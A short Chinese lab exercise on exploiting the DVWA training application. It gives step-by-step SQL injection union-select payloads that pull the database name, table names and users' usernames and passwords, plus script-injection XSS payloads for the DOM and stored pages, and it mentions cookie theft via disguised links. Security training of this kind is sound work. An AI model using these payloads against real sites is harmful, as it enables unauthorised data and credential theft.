实训五(二):网页漏洞利用
SQL 注入
1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。输入1提交,将正常返回查询结果。输入1’提交,将返回一个错误。
2、输入1' union select 1,database()#提交,得到数据库名称。
3、输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#,得到数据库中的表名。
4、我们拥有了查询数据库的权限,那么输入 1' union select 1,concat (user,password) from users#,就能得到 users 表的所有用户名和密码。
跨站脚本
反射型:打开 XSS (DOM) 界面,修改地址栏中的 default 属性为 < script>alert ('XXX')</script>,回车后命令被执行,说明此处有漏洞。和前者一样,可以是哟个短链接伪装并诱导打开执行,多用于 cookies 的窃取。
存储型:打开 XSS (Stored) 界面,在 message 栏中填入 < script>alert ('XXX')</script>,提交后内容被存入数据库,之后每次进入该页面命令都会被执行。